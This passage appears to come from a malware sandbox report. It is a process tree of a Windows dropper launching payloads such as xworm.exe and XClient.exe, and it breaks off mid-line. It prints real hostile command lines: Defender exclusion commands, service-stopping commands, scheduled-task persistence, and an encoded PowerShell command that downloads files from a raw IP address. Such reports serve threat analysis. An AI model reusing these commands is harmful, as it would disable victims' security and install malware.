                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,3487222297909374954,9670724554702001368,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6016 /prefetch:8
                                                                          3⤵
                                                                            PID:1376
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,3487222297909374954,9670724554702001368,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6016 /prefetch:8
                                                                            3⤵
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:1336
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,3487222297909374954,9670724554702001368,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:1
                                                                            3⤵
                                                                              PID:4316
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,3487222297909374954,9670724554702001368,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4372 /prefetch:1
                                                                              3⤵
                                                                                PID:3044
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,3487222297909374954,9670724554702001368,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2636 /prefetch:1
                                                                                3⤵
                                                                                  PID:1856
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,3487222297909374954,9670724554702001368,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:1
                                                                                  3⤵
                                                                                    PID:1276
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,3487222297909374954,9670724554702001368,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:1
                                                                                    3⤵
                                                                                      PID:3196
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,3487222297909374954,9670724554702001368,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3936 /prefetch:1
                                                                                      3⤵
                                                                                        PID:3008
                                                                                    • C:\Users\Admin\Desktop\4363463463464363463463463.exe
                                                                                      "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
                                                                                      2⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:4404
                                                                                      • C:\Users\Admin\Desktop\Files\num.exe
                                                                                        "C:\Users\Admin\Desktop\Files\num.exe"
                                                                                        3⤵
                                                                                        • Checks computer location settings
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Checks processor information in registry
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:2508
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Desktop\Files\num.exe" & del "C:\ProgramData\*.dll"" & exit
                                                                                          4⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:2696
                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                            timeout /t 5
                                                                                            5⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Delays execution with timeout.exe
                                                                                            PID:4564
                                                                                      • C:\Users\Admin\Desktop\Files\xxxx.exe
                                                                                        "C:\Users\Admin\Desktop\Files\xxxx.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:2208
                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                          4⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:576
                                                                                      • C:\Users\Admin\Desktop\Files\aimhvcion.exe
                                                                                        "C:\Users\Admin\Desktop\Files\aimhvcion.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4676
                                                                                      • C:\Users\Admin\Desktop\Files\1.exe
                                                                                        "C:\Users\Admin\Desktop\Files\1.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        • Drops file in Windows directory
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:1904
                                                                                        • C:\Windows\sysklnorbcv.exe
                                                                                          C:\Windows\sysklnorbcv.exe
                                                                                          4⤵
                                                                                          • Modifies security service
                                                                                          • Windows security bypass
                                                                                          • Checks computer location settings
                                                                                          • Executes dropped EXE
                                                                                          • Windows security modification
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:4684
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                                            5⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:2272
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                                              6⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:3352
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
                                                                                            5⤵
                                                                                              PID:1196
                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                sc stop UsoSvc
                                                                                                6⤵
                                                                                                • Launches sc.exe
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:3232
                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                sc stop WaaSMedicSvc
                                                                                                6⤵
                                                                                                • Launches sc.exe
                                                                                                PID:3428
                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                sc stop wuauserv
                                                                                                6⤵
                                                                                                • Launches sc.exe
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:2584
                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                sc stop DoSvc
                                                                                                6⤵
                                                                                                • Launches sc.exe
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:648
                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                sc stop BITS
                                                                                                6⤵
                                                                                                • Launches sc.exe
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:1632
                                                                                            • C:\Users\Admin\AppData\Local\Temp\2103620730.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\2103620730.exe
                                                                                              5⤵
                                                                                              • Checks computer location settings
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:4120
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                                                6⤵
                                                                                                  PID:1168
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                                                    7⤵
                                                                                                      PID:2256
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                                                    6⤵
                                                                                                      PID:2456
                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                        schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                                                        7⤵
                                                                                                          PID:3528
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\859812757.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\859812757.exe
                                                                                                      5⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:4616
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\70345605.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\70345605.exe
                                                                                                      5⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:2244
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3791032412.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\3791032412.exe
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5696
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                          7⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          PID:4976
                                                                                                        • C:\Windows\System32\schtasks.exe
                                                                                                          C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
                                                                                                          7⤵
                                                                                                            PID:5276
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3259130302.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\3259130302.exe
                                                                                                        5⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:4148
                                                                                                  • C:\Users\Admin\Desktop\Files\t2.exe
                                                                                                    "C:\Users\Admin\Desktop\Files\t2.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:4724
                                                                                                  • C:\Users\Admin\Desktop\Files\te3tlsre.exe
                                                                                                    "C:\Users\Admin\Desktop\Files\te3tlsre.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:3804
                                                                                                  • C:\Users\Admin\Desktop\Files\tl.exe
                                                                                                    "C:\Users\Admin\Desktop\Files\tl.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Adds Run key to start application
                                                                                                    • Drops file in Windows directory
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:3896
                                                                                                    • C:\Windows\sysppvrdnvs.exe
                                                                                                      C:\Windows\sysppvrdnvs.exe
                                                                                                      4⤵
                                                                                                      • Modifies security service
                                                                                                      • Windows security bypass
                                                                                                      • Checks computer location settings
                                                                                                      • Executes dropped EXE
                                                                                                      • Windows security modification
                                                                                                      • Suspicious behavior: SetClipboardViewer
                                                                                                      PID:1876
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                                                        5⤵
                                                                                                          PID:3888
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                                                            6⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:1596
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
                                                                                                          5⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:872
                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                            sc stop UsoSvc
                                                                                                            6⤵
                                                                                                            • Launches sc.exe
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:1640
                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                            sc stop WaaSMedicSvc
                                                                                                            6⤵
                                                                                                            • Launches sc.exe
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:2696
                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                            sc stop wuauserv
                                                                                                            6⤵
                                                                                                            • Launches sc.exe
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:3120
                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                            sc stop DoSvc
                                                                                                            6⤵
                                                                                                            • Launches sc.exe
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:2496
                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                            sc stop BITS /wait
                                                                                                            6⤵
                                                                                                            • Launches sc.exe
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:608
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2649530790.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\2649530790.exe
                                                                                                          5⤵
                                                                                                          • Checks computer location settings
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5572
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                                                            6⤵
                                                                                                              PID:5672
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                                                                7⤵
                                                                                                                  PID:5772
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                                                                6⤵
                                                                                                                  PID:5716
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                                                                    7⤵
                                                                                                                      PID:5872
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1922222311.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\1922222311.exe
                                                                                                                  5⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:5292
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\2317815259.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\2317815259.exe
                                                                                                                  5⤵
                                                                                                                    PID:5976
                                                                                                              • C:\Users\Admin\Desktop\Files\r.exe
                                                                                                                "C:\Users\Admin\Desktop\Files\r.exe"
                                                                                                                3⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Adds Run key to start application
                                                                                                                • Drops file in Windows directory
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:4184
                                                                                                                • C:\Windows\sysvplervcs.exe
                                                                                                                  C:\Windows\sysvplervcs.exe
                                                                                                                  4⤵
                                                                                                                  • Modifies security service
                                                                                                                  • Windows security bypass
                                                                                                                  • Checks computer location settings
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Windows security modification
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  • Suspicious behavior: SetClipboardViewer
                                                                                                                  PID:900
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                                                                    5⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:3240
                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                                                                      6⤵
                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:1924
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
                                                                                                                    5⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:1564
                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                      sc stop UsoSvc
                                                                                                                      6⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:3748
                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                      sc stop WaaSMedicSvc
                                                                                                                      6⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:60
                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                      sc stop wuauserv
                                                                                                                      6⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:4320
                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                      sc stop DoSvc
                                                                                                                      6⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:3824
                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                      sc stop BITS /wait
                                                                                                                      6⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:2508
                                                                                                              • C:\Users\Admin\Desktop\Files\XClient.exe
                                                                                                                "C:\Users\Admin\Desktop\Files\XClient.exe"
                                                                                                                3⤵
                                                                                                                • Checks computer location settings
                                                                                                                • Drops startup file
                                                                                                                • Executes dropped EXE
                                                                                                                • Adds Run key to start application
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:4220
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\XClient.exe'
                                                                                                                  4⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:2356
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                                                                                                                  4⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:3368
                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    5⤵
                                                                                                                      PID:1564
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Steam.exe'
                                                                                                                    4⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:3756
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Steam.exe'
                                                                                                                    4⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:4168
                                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                                    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Steam" /tr "C:\Users\Admin\AppData\Roaming\Steam.exe"
                                                                                                                    4⤵
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:4208
                                                                                                                • C:\Users\Admin\Desktop\Files\MK.exe
                                                                                                                  "C:\Users\Admin\Desktop\Files\MK.exe"
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:4464
                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                    4⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • Modifies system certificate store
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:4908
                                                                                                                • C:\Users\Admin\Desktop\Files\pp.exe
                                                                                                                  "C:\Users\Admin\Desktop\Files\pp.exe"
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:1720
                                                                                                                • C:\Users\Admin\Desktop\Files\xworm.exe
                                                                                                                  "C:\Users\Admin\Desktop\Files\xworm.exe"
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  PID:2416
                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                    4⤵
                                                                                                                      PID:3916
                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                      4⤵
                                                                                                                        PID:5036
                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                        4⤵
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                        PID:1036
                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAeQBsACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBtACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAGoAZQBjAHQAaQBvAG4AIABlAHIAcgBvAHIAIQAgAEYAaQBsAGUAIABtAHUAcwB0ACAAYgBlACAAcwB0AGEAcgB0AGUAZAAgAGEAcwAgAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIQAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAYwB1AGsAIwA+ADsAIgA7ADwAIwBsAG0AbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAcQBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB5ACMAPgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AWQBlAGwAbABvAHcALgBlAHgAZQAnACwAIAA8ACMAdgBqAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB6AGMAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB1AGIAZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQApADwAIwB3AGwAZgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AYQB2AGQAaQBzAGEAYgBsAGUALgBiAGEAdAAnACwAIAA8ACMAZAB3AGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGQAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB5AGwAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBBAHYAZABpAHMALgBiAGEAdAAnACkAKQA8ACMAcABmAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMgAwADkALgAxADYAMAAuADcAMAAvAEwAaQBjAGUAbgBzAGUAQwBoAGUAYwBrAGUAcgAuAGUAeABlACcALAAgADwAIwBiAHMAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAdgBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAYQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApACkAPAAjAHEAdQBzACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0A